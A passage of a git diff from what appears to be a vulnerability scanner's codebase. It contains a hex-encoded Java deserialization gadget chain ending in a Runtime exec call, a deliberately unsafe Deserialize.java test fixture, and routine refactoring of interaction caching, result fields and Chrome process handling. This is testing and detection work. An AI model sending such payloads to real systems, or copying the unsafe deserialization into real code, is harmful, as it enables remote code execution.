hex.DecodeString("08003201000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003400350A002D003601002179736F73657269616C2F4A6578426F7373323434393535333834303536333337380100234C79736F73657269616C2F4A6578426F7373323434393535333834303536333337383B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000001C000E0000000C000100000005000F003900000001001300140002000C0000003F0000000300000001B100000002000D0000000600010000001F000E00000020000300000001000F0039000000000001001500160001000000010017001800020019000000040001001A00010013001B0003000C000000490000000400000001B100000002000D00000006000100000022000E0000002A000400000001000F003900000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A0020000000060001002100000008002B000B0001000C0000001B000300020000000FA70003014CB800311233B6003757B1000000000002002200000002002300110000000A000100020025001000097571007E000D0000019BCAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100124C7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A0100107574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501000C7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D00000006000100000026000E0000000C000100000005000F001200000002001300000002001400110000000A00010002001600100009707400076A6578626F73737077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200024C000564756D6D797400124C6A6176612F6C616E672F4F626A6563743B4C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B7870737200296A6176612E6265616E732E6265616E636F6E746578742E4265616E436F6E74657874537570706F7274BC4820F0918FB90C03000149000C73657269616C697A61626C657872002E6A6176612E6265616E732E6265616E636F6E746578742E4265616E436F6E746578744368696C64537570706F727457D4EFC704DC72250200014C00146265616E436F6E746578744368696C64506565727400294C6A6176612F6265616E732F6265616E636F6E746578742F4265616E436F6E746578744368696C643B787071007E0019000000017372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50300024C0004747970657400114C6A6176612F6C616E672F436C6173733B4C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B78707672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657300000000000000000000007870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001740008663561356136303871007E0009787704000000007871007E001D78") + buffer.Write(suffix) + + return buffer.Bytes() +} diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java b/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java new file mode 100644 index 0000000000..b63528ddf0 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java @@ -0,0 +1,30 @@ +import java.io.*; + +class Deserialize { + public static void main(String args[]) { + FileInputStream fileIn = null; + ObjectInputStream in = null; + ValueObject vo2 = null; + + try { + fileIn = new FileInputStream("ValueObject2.ser"); + } + catch(FileNotFoundException e) { + e.printStackTrace(); + } + + try { + in = new ObjectInputStream(fileIn); + } + catch(IOException e) { + e.printStackTrace(); + } + try { + vo2 = (ValueObject) in.readObject(); + } + catch(Exception e) { + e.printStackTrace(); + } + System.out.println(vo2); + } +} \ No newline at end of file diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md b/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md new file mode 100644 index 0000000000..666ee024a6 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md @@ -0,0 +1,11 @@ +# testdata + +### Test Unsafe Java Deserialization + +``` +javac Deserialize.java ValueObject.java +# generate payload and write to ValueObject2.ser +java Deserialize +``` + +Modified From: https://snyk.io/blog/serialization-and-deserialization-in-java/ \ No newline at end of file diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java b/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java new file mode 100644 index 0000000000..cbf3011ca4 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java @@ -0,0 +1,15 @@ +import java.io.*; + +public class ValueObject implements Serializable { + private String value; + private String sideEffect; + + public ValueObject() { + this("empty"); + } + + public ValueObject(String value) { + this.value = value; + this.sideEffect = java.time.LocalTime.now().toString(); + } +} diff --git a/v2/pkg/protocols/common/interactsh/interactsh.go b/v2/pkg/protocols/common/interactsh/interactsh.go index b6730b1e73..6fa71797be 100644 --- a/v2/pkg/protocols/common/interactsh/interactsh.go +++ b/v2/pkg/protocols/common/interactsh/interactsh.go @@ -3,6 +3,7 @@ package interactsh import ( "net/url" "strings" + "sync/atomic" "time" "github.com/karlseguin/ccache" @@ -14,24 +15,31 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/progress" "github.com/projectdiscovery/nuclei/v2/pkg/reporting" - "github.com/valyala/fasttemplate" ) // Client is a wrapped client for interactsh server. type Client struct { + dotHostname string // interactsh is a client for interactsh server. interactsh *client.Client // requests is a stored cache for interactsh-url->request-event data. requests *ccache.Cache + // interactions is a stored cache for interactsh-interaction->interactsh-url data + interactions *ccache.Cache - matched bool - dotHostname string + options *Options eviction time.Duration pollDuration time.Duration cooldownDuration time.Duration + + generated uint32 // decide to wait if we have a generated url + matched bool } -var interactshURLMarker = "{{interactsh-url}}" +var ( + defaultInteractionDuration = 60 * time.Second + interactshURLMarker = "{{interactsh-url}}" +) // Options contains configuration options for interactsh nuclei integration. type Options struct { @@ -56,6 +64,8 @@ type Options struct { Progress progress.Progress } +const defaultMaxInteractionsCount = 5000 + // New returns a new interactsh server client func New(options *Options) (*Client, error) { parsed, err := url.Parse(options.ServerURL) @@ -74,10 +84,16 @@ func New(options *Options) (*Client, error) { configure = configure.MaxSize(options.CacheSize) cache := ccache.New(configure) + interactionsCfg := ccache.Configure() + interactionsCfg = interactionsCfg.MaxSize(defaultMaxInteractionsCount) + interactionsCache := ccache.New(interactionsCfg) + interactClient := &Client{ interactsh: interactsh, eviction: options.Eviction, + interactions: interactionsCache, dotHostname: "." + parsed.Host, + options: options, requests: cache, pollDuration: options.PollDuration, cooldownDuration: options.ColldownPeriod, @@ -86,54 +102,70 @@ func New(options *Options) (*Client, error) { interactClient.interactsh.StartPolling(interactClient.pollDuration, func(interaction *server.Interaction) { item := interactClient.requests.Get(interaction.UniqueID) if item == nil { + // If we don't have any request for this ID, add it to temporary + // lru cache so we can correlate when we get an add request. + gotItem := interactClient.interactions.Get(interaction.UniqueID) + if gotItem == nil { + interactClient.interactions.Set(interaction.UniqueID, []*server.Interaction{interaction}, defaultInteractionDuration) + } else if items, ok := gotItem.Value().([]*server.Interaction); ok { + items = append(items, interaction) + interactClient.interactions.Set(interaction.UniqueID, items, defaultInteractionDuration) + } return } - data, ok := item.Value().(*RequestData) + request, ok := item.Value().(*RequestData) if !ok { return } + _ = interactClient.processInteractionForRequest(interaction, request) + }) + return interactClient, nil +} - data.Event.InternalEvent["interactsh_protocol"] = interaction.Protocol - data.Event.InternalEvent["interactsh_request"] = interaction.RawRequest - data.Event.InternalEvent["interactsh_response"] = interaction.RawResponse - result, matched := data.Operators.Execute(data.Event.InternalEvent, data.MatchFunc, data.ExtractFunc) - if !matched || result == nil { - return // if we don't match, return - } - interactClient.requests.Delete(interaction.UniqueID) +// processInteractionForRequest processes an interaction for a request +func (c *Client) processInteractionForRequest(interaction *server.Interaction, data *RequestData) bool { + data.Event.InternalEvent["interactsh_protocol"] = interaction.Protocol + data.Event.InternalEvent["interactsh_request"] = interaction.RawRequest + data.Event.InternalEvent["interactsh_response"] = interaction.RawResponse + result, matched := data.Operators.Execute(data.Event.InternalEvent, data.MatchFunc, data.ExtractFunc) + if !matched || result == nil { + return false // if we don't match, return + } + c.requests.Delete(interaction.UniqueID) - if data.Event.OperatorsResult != nil { - data.Event.OperatorsResult.Merge(result) - } else { - data.Event.OperatorsResult = result + if data.Event.OperatorsResult != nil { + data.Event.OperatorsResult.Merge(result) + } else { + data.Event.OperatorsResult = result + } + data.Event.Results = data.MakeResultFunc(data.Event) + + for _, result := range data.Event.Results { + result.Interaction = interaction + _ = c.options.Output.Write(result) + if !c.matched { + c.matched = true } - data.Event.Results = data.MakeResultFunc(data.Event) - for _, result := range data.Event.Results { - result.Interaction = interaction - _ = options.Output.Write(result) - if !interactClient.matched { - interactClient.matched = true - } - options.Progress.IncrementMatched() + c.options.Progress.IncrementMatched() - if options.IssuesClient != nil { - if err := options.IssuesClient.CreateIssue(result); err != nil { - gologger.Warning().Msgf("Could not create issue on tracker: %s", err) - } + if c.options.IssuesClient != nil { + if err := c.options.IssuesClient.CreateIssue(result); err != nil { + gologger.Warning().Msgf("Could not create issue on tracker: %s", err) } } - }) - return interactClient, nil + } + return true } // URL returns a new URL that can be interacted with func (c *Client) URL() string { + atomic.CompareAndSwapUint32(&c.generated, 0, 1) return c.interactsh.URL() } // Close closes the interactsh clients after waiting for cooldown period. func (c *Client) Close() bool { - if c.cooldownDuration > 0 { + if c.cooldownDuration > 0 && atomic.LoadUint32(&c.generated) == 1 { time.Sleep(c.cooldownDuration) } c.interactsh.StopPolling() @@ -150,9 +182,7 @@ func (c *Client) ReplaceMarkers(data, interactshURL string) string { if !strings.Contains(data, interactshURLMarker) { return data } - replaced := fasttemplate.ExecuteStringStd(data, "{{", "}}", map[string]interface{}{ - "interactsh-url": interactshURL, - }) + replaced := strings.NewReplacer("{{interactsh-url}}", interactshURL).Replace(data) return replaced } @@ -171,7 +201,28 @@ type RequestData struct { // RequestEvent is the event for a network request sent by nuclei. func (c *Client) RequestEvent(interactshURL string, data *RequestData) { id := strings.TrimSuffix(interactshURL, c.dotHostname) - c.requests.Set(id, data, c.eviction) + + interaction := c.interactions.Get(id) + if interaction != nil { + // If we have previous interactions, get them and process them. + interactions, ok := interaction.Value().([]*server.Interaction) + if !ok { + c.requests.Set(id, data, c.eviction) + return + } + matched := false + for _, interaction := range interactions { + if c.processInteractionForRequest(interaction, data) { + matched = true + break + } + } + if matched { + c.interactions.Delete(id) + } + } else { + c.requests.Set(id, data, c.eviction) + } } // HasMatchers returns true if an operator has interactsh part diff --git a/v2/pkg/protocols/common/protocolinit/init.go b/v2/pkg/protocols/common/protocolinit/init.go index b31958c9cd..1877a1ab3b 100644 --- a/v2/pkg/protocols/common/protocolinit/init.go +++ b/v2/pkg/protocols/common/protocolinit/init.go @@ -22,10 +22,7 @@ func Init(options *types.Options) error { if err := httpclientpool.Init(options); err != nil { return err } - if err := networkclientpool.Init(options); err != nil { - return err - } - return nil + return networkclientpool.Init(options) } var userAgents = []string{ diff --git a/v2/pkg/protocols/common/protocolstate/state.go b/v2/pkg/protocols/common/protocolstate/state.go index deb6b3e3fe..0f80f66477 100644 --- a/v2/pkg/protocols/common/protocolstate/state.go +++ b/v2/pkg/protocols/common/protocolstate/state.go @@ -6,8 +6,10 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/types" ) +// Dialer is a shared fastdialer instance for host DNS resolution var Dialer *fastdialer.Dialer +// Init creates the Dialer instance based on user configuration func Init(options *types.Options) error { opts := fastdialer.DefaultOptions if options.SystemResolvers { @@ -24,6 +26,7 @@ func Init(options *types.Options) error { return nil } +// Close closes the global shared fastdialer func Close() { if Dialer != nil { Dialer.Close() diff --git a/v2/pkg/protocols/dns/dns.go b/v2/pkg/protocols/dns/dns.go index 5fdf49cc59..0538186f94 100644 --- a/v2/pkg/protocols/dns/dns.go +++ b/v2/pkg/protocols/dns/dns.go @@ -118,6 +118,8 @@ func questionTypeToInt(questionType string) uint16 { question = dns.TypeMX case "TXT": question = dns.TypeTXT + case "DS": + question = dns.TypeDS case "AAAA": question = dns.TypeAAAA } diff --git a/v2/pkg/protocols/dns/operators.go b/v2/pkg/protocols/dns/operators.go index 860a38f858..5d18c4d52c 100644 --- a/v2/pkg/protocols/dns/operators.go +++ b/v2/pkg/protocols/dns/operators.go @@ -103,6 +103,7 @@ func (r *Request) responseToDSLMap(req, resp *dns.Msg, host, matched string) out data["raw"] = rawData data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -137,6 +138,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "dns", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/dns/operators_test.go b/v2/pkg/protocols/dns/operators_test.go index c8de0ddeaf..275bf1bbdd 100644 --- a/v2/pkg/protocols/dns/operators_test.go +++ b/v2/pkg/protocols/dns/operators_test.go @@ -42,7 +42,7 @@ func TestResponseToDSLMap(t *testing.T) { resp.Answer = append(resp.Answer, &dns.A{A: net.ParseIP("1.1.1.1"), Hdr: dns.RR_Header{Name: "one.one.one.one."}}) event := request.responseToDSLMap(req, resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 11, "could not get correct number of items in dsl map") + require.Len(t, event, 12, "could not get correct number of items in dsl map") require.Equal(t, dns.RcodeSuccess, event["rcode"], "could not get correct rcode") } diff --git a/v2/pkg/protocols/file/file.go b/v2/pkg/protocols/file/file.go index df362531ca..d5b8101849 100644 --- a/v2/pkg/protocols/file/file.go +++ b/v2/pkg/protocols/file/file.go @@ -37,7 +37,7 @@ type Request struct { } // defaultDenylist is the default list of extensions to be denied -var defaultDenylist = []string{".3g2", ".3gp", ".7z", ".apk", ".arj", ".avi", ".axd", ".bmp", ".css", ".csv", ".deb", ".dll", ".doc", ".drv", ".eot", ".exe", ".flv", ".gif", ".gifv", ".gz", ".h264", ".ico", ".iso", ".jar", ".jpeg", ".jpg", ".lock", ".m4a", ".m4v", ".map", ".mkv", ".mov", ".mp3", ".mp4", ".mpeg", ".mpg", ".msi", ".ogg", ".ogm", ".ogv", ".otf", ".pdf", ".pkg", ".png", ".ppt", ".psd", ".rar", ".rm", ".rpm", ".svg", ".swf", ".sys", ".tar.gz", ".tar", ".tif", ".tiff", ".ttf", ".txt", ".vob", ".wav", ".webm", ".wmv", ".woff", ".woff2", ".xcf", ".xls", ".xlsx", ".zip"} +var defaultDenylist = []string{".3g2", ".3gp", ".7z", ".apk", ".arj", ".avi", ".axd", ".bmp", ".css", ".csv", ".deb", ".dll", ".doc", ".drv", ".eot", ".exe", ".flv", ".gif", ".gifv", ".gz", ".h264", ".ico", ".iso", ".jar", ".jpeg", ".jpg", ".lock", ".m4a", ".m4v", ".map", ".mkv", ".mov", ".mp3", ".mp4", ".mpeg", ".mpg", ".msi", ".ogg", ".ogm", ".ogv", ".otf", ".pdf", ".pkg", ".png", ".ppt", ".psd", ".rar", ".rm", ".rpm", ".svg", ".swf", ".sys", ".tar.gz", ".tar", ".tif", ".tiff", ".ttf", ".vob", ".wav", ".webm", ".wmv", ".woff", ".woff2", ".xcf", ".xls", ".xlsx", ".zip"} // GetID returns the unique ID of the request if any. func (r *Request) GetID() string { diff --git a/v2/pkg/protocols/file/operators.go b/v2/pkg/protocols/file/operators.go index 7b3b59fee6..f2a57a3d29 100644 --- a/v2/pkg/protocols/file/operators.go +++ b/v2/pkg/protocols/file/operators.go @@ -1,6 +1,8 @@ package file import ( + "bufio" + "strings" "time" "github.com/projectdiscovery/nuclei/v2/pkg/operators/extractors" @@ -71,6 +73,7 @@ func (r *Request) responseToDSLMap(raw, host, matched string) output.InternalEve data["raw"] = raw data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -99,16 +102,45 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu data := r.makeResultEventItem(wrapped) results = append(results, data) } + raw, ok := wrapped.InternalEvent["raw"] + if !ok { + return results + } + rawStr, ok := raw.(string) + if !ok { + return results + } + + // Identify the position of match in file using a dirty hack. + for _, result := range results { + for _, extraction := range result.ExtractedResults { + scanner := bufio.NewScanner(strings.NewReader(rawStr)) + + line := 1 + for scanner.Scan() { + if strings.Contains(scanner.Text(), extraction) { + if result.FileToIndexPosition == nil { + result.FileToIndexPosition = make(map[string]int) + } + result.FileToIndexPosition[result.Matched] = line + continue + } + line++ + } + } + } return results } func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "file", Path: types.ToString(wrapped.InternalEvent["path"]), Matched: types.ToString(wrapped.InternalEvent["matched"]), + Host: types.ToString(wrapped.InternalEvent["matched"]), ExtractedResults: wrapped.OperatorsResult.OutputExtracts, Timestamp: time.Now(), } diff --git a/v2/pkg/protocols/file/operators_test.go b/v2/pkg/protocols/file/operators_test.go index b6aa59d84e..f6da253ca7 100644 --- a/v2/pkg/protocols/file/operators_test.go +++ b/v2/pkg/protocols/file/operators_test.go @@ -32,7 +32,7 @@ func TestResponseToDSLMap(t *testing.T) { resp := "test-data\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") } @@ -57,7 +57,7 @@ func TestFileOperatorMatch(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") t.Run("valid", func(t *testing.T) { @@ -122,7 +122,7 @@ func TestFileOperatorExtract(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") t.Run("extract", func(t *testing.T) { @@ -187,7 +187,7 @@ func TestFileMakeResult(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") finalEvent := &output.InternalWrappedEvent{InternalEvent: event} diff --git a/v2/pkg/protocols/headless/engine/engine.go b/v2/pkg/protocols/headless/engine/engine.go index 6c8d613e97..ba5b4cef34 100644 --- a/v2/pkg/protocols/headless/engine/engine.go +++ b/v2/pkg/protocols/headless/engine/engine.go @@ -10,16 +10,17 @@ import ( "github.com/corpix/uarand" "github.com/go-rod/rod" "github.com/go-rod/rod/lib/launcher" - ps "github.com/mitchellh/go-ps" "github.com/pkg/errors" "github.com/projectdiscovery/nuclei/v2/pkg/types" + "github.com/projectdiscovery/stringsutil" + ps "github.com/shirou/gopsutil/v3/process" ) // Browser is a browser structure for nuclei headless module type Browser struct { customAgent string tempDir string - previouspids map[int]struct{} // track already running pids + previouspids map[int32]struct{} // track already running pids engine *rod.Browser httpclient *http.Client options *types.Options @@ -31,6 +32,7 @@ func New(options *types.Options) (*Browser, error) { if err != nil { return nil, errors.Wrap(err, "could not create temporary directory") } + previouspids := findChromeProcesses() chromeLauncher := launcher.New(). Leakless(false). Set("disable-gpu", "true"). @@ -84,7 +86,7 @@ func New(options *types.Options) (*Browser, error) { httpclient: httpclient, options: options, } - engine.previouspids = engine.findChromeProcesses() + engine.previouspids = previouspids return engine, nil } @@ -98,24 +100,39 @@ func (b *Browser) Close() { // killChromeProcesses any and all new chrome processes started after // headless process launch. func (b *Browser) killChromeProcesses() { - newProcesses := b.findChromeProcesses() - for id := range newProcesses { - if _, ok := b.previouspids[id]; ok { + processes, _ := ps.Processes() + + for _, process := range processes { + // skip non chrome processes + if !isChromeProcess(process) { continue } - kill(id) + // skip chrome processes that were already running + if _, ok := b.previouspids[process.Pid]; ok { + continue + } + _ = process.Kill() } } // findChromeProcesses finds chrome process running on host -func (b *Browser) findChromeProcesses() map[int]struct{} { +func findChromeProcesses() map[int32]struct{} { processes, _ := ps.Processes() - list := make(map[int]struct{}) + list := make(map[int32]struct{}) for _, process := range processes { - if strings.Contains(process.Executable(), "chrome") || strings.Contains(process.Executable(), "chromium") { - list[process.PPid()] = struct{}{} - list[process.Pid()] = struct{}{} + if isChromeProcess(process) { + list[process.Pid] = struct{}{} + if ppid, err := process.Ppid(); err == nil { + list[ppid] = struct{}{} + } } } return list } + +// isChromeProcess checks if a process is chrome/chromium +func isChromeProcess(process *ps.Process) bool { + name, _ := process.Name() + executable, _ := process.Exe() + return stringsutil.ContainsAny(name, "chrome", "chromium") || stringsutil.ContainsAny(executable, "chrome", "chromium") +} diff --git a/v2/pkg/protocols/headless/engine/engine_unix.go b/v2/pkg/protocols/headless/engine/engine_unix.go deleted file mode 100644 index 73a3e55fad..0000000000 --- a/v2/pkg/protocols/headless/engine/engine_unix.go +++ /dev/null @@ -1,11 +0,0 @@ -// +build !windows - -package engine - -import ( - "syscall" -) - -func kill(pid int) { - _ = syscall.Kill(-pid, syscall.SIGKILL) -} diff --git a/v2/pkg/protocols/headless/engine/engine_windows.go b/v2/pkg/protocols/headless/engine/engine_windows.go deleted file mode 100644 index feb97ff624..0000000000 --- a/v2/pkg/protocols/headless/engine/engine_windows.go +++ /dev/null @@ -1,12 +0,0 @@ -// +build windows - -package engine - -import ( - "os/exec" - "strconv" -) - -func kill(pid int) { - _ = exec.Command("taskkill", "/t", "/f", "/pid", strconv.Itoa(pid)).Run() -} diff --git a/v2/pkg/protocols/headless/engine/page.go b/v2/pkg/protocols/headless/engine/page.go index 185eb33c7e..16eae572f7 100644 --- a/v2/pkg/protocols/headless/engine/page.go +++ b/v2/pkg/protocols/headless/engine/page.go @@ -49,7 +49,6 @@ func (i *Instance) Run(baseURL *url.URL, actions []*Action, timeout time.Duratio if err != nil { return nil, nil, err } - go router.Run() data, err := createdPage.ExecuteActions(baseURL, actions) if err != nil { diff --git a/v2/pkg/protocols/headless/engine/page_actions_test.go b/v2/pkg/protocols/headless/engine/page_actions_test.go index e89fe53542..658c329081 100644 --- a/v2/pkg/protocols/headless/engine/page_actions_test.go +++ b/v2/pkg/protocols/headless/engine/page_actions_test.go @@ -23,6 +23,7 @@ func TestActionNavigate(t *testing.T) { instance, err := browser.NewInstance() require.Nil(t, err, "could not create browser instance") + defer instance.Close() ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { fmt.Fprintln(w, ` diff --git a/v2/pkg/protocols/headless/operators.go b/v2/pkg/protocols/headless/operators.go index f1845a89e5..265dc95d72 100644 --- a/v2/pkg/protocols/headless/operators.go +++ b/v2/pkg/protocols/headless/operators.go @@ -72,6 +72,7 @@ func (r *Request) responseToDSLMap(resp, req, host, matched string) output.Inter data["data"] = resp data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -106,6 +107,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "headless", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/http/cluster.go b/v2/pkg/protocols/http/cluster.go index 68107c9ebd..bdfa073586 100644 --- a/v2/pkg/protocols/http/cluster.go +++ b/v2/pkg/protocols/http/cluster.go @@ -10,7 +10,7 @@ import ( // are similar enough to be considered one and can be checked by // just adding the matcher/extractors for the request and the correct IDs. func (r *Request) CanCluster(other *Request) bool { - if len(r.Payloads) > 0 || len(r.Raw) > 0 || len(r.Body) > 0 || r.Unsafe { + if len(r.Payloads) > 0 || len(r.Raw) > 0 || len(r.Body) > 0 || r.Unsafe || r.ReqCondition || r.Name != "" { return false } if r.Method != other.Method || diff --git a/v2/pkg/protocols/http/http.go b/v2/pkg/protocols/http/http.go index 2f8c4212cf..ecd297f8d7 100644 --- a/v2/pkg/protocols/http/http.go +++ b/v2/pkg/protocols/http/http.go @@ -111,7 +111,7 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { r.Raw[i] = strings.ReplaceAll(raw, "\n", "\r\n") } } - r.rawhttpClient = httpclientpool.GetRawHTTP() + r.rawhttpClient = httpclientpool.GetRawHTTP(options.Options) } if len(r.Matchers) > 0 || len(r.Extractors) > 0 { compiled := &r.Operators diff --git a/v2/pkg/protocols/http/httpclientpool/clientpool.go b/v2/pkg/protocols/http/httpclientpool/clientpool.go index 67ecfe7461..8d0057fa84 100644 --- a/v2/pkg/protocols/http/httpclientpool/clientpool.go +++ b/v2/pkg/protocols/http/httpclientpool/clientpool.go @@ -24,7 +24,9 @@ import ( ) var ( - Dialer *fastdialer.Dialer + // Dialer is a copy of the fastdialer from protocolstate + Dialer *fastdialer.Dialer + rawhttpClient *rawhttp.Client poolMutex *sync.RWMutex normalClient *retryablehttp.Client @@ -77,9 +79,11 @@ func (c *Configuration) Hash() string { } // GetRawHTTP returns the rawhttp request client -func GetRawHTTP() *rawhttp.Client { +func GetRawHTTP(options *types.Options) *rawhttp.Client { if rawhttpClient == nil { - rawhttpClient = rawhttp.NewClient(rawhttp.DefaultOptions) + rawhttpOptions := rawhttp.DefaultOptions + rawhttpOptions.Timeout = time.Duration(options.Timeout) * time.Second + rawhttpClient = rawhttp.NewClient(rawhttpOptions) } return rawhttpClient } @@ -92,7 +96,7 @@ func Get(options *types.Options, configuration *Configuration) (*retryablehttp.C return wrappedGet(options, configuration) } -// wrappedGet wraps a get operation without normal cliet check +// wrappedGet wraps a get operation without normal client check func wrappedGet(options *types.Options, configuration *Configuration) (*retryablehttp.Client, error) { var proxyURL *url.URL var err error @@ -100,9 +104,6 @@ func wrappedGet(options *types.Options, configuration *Configuration) (*retryabl if Dialer == nil { Dialer = protocolstate.Dialer } - if err != nil { - return nil, errors.Wrap(err, "could not create dialer") - } hash := configuration.Hash() poolMutex.RLock() diff --git a/v2/pkg/protocols/http/operators.go b/v2/pkg/protocols/http/operators.go index 0c1fcb9956..ba6f9a6cdf 100644 --- a/v2/pkg/protocols/http/operators.go +++ b/v2/pkg/protocols/http/operators.go @@ -54,6 +54,8 @@ func (r *Request) Extract(data map[string]interface{}, extractor *extractors.Ext return extractor.ExtractRegex(item) case extractors.KValExtractor: return extractor.ExtractKval(data) + case extractors.JSONExtractor: + return extractor.ExtractJSON(item) } return nil } @@ -105,14 +107,16 @@ func (r *Request) responseToDSLMap(resp *http.Response, host, matched, rawReq, r data["duration"] = duration.Seconds() data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } // MakeResultEvent creates a result event from internal wrapped event func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*output.ResultEvent { - if len(wrapped.OperatorsResult.DynamicValues) > 0 { + if len(wrapped.OperatorsResult.DynamicValues) > 0 && !wrapped.OperatorsResult.Matched { return nil } + results := make([]*output.ResultEvent, 0, len(wrapped.OperatorsResult.Matches)+1) // If we have multiple matchers with names, write each of them separately. @@ -139,6 +143,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "http", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/http/operators_test.go b/v2/pkg/protocols/http/operators_test.go index ccddc7b5d3..7328fce867 100644 --- a/v2/pkg/protocols/http/operators_test.go +++ b/v2/pkg/protocols/http/operators_test.go @@ -38,7 +38,7 @@ func TestResponseToDSLMap(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") } @@ -68,7 +68,7 @@ func TestHTTPOperatorMatch(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, 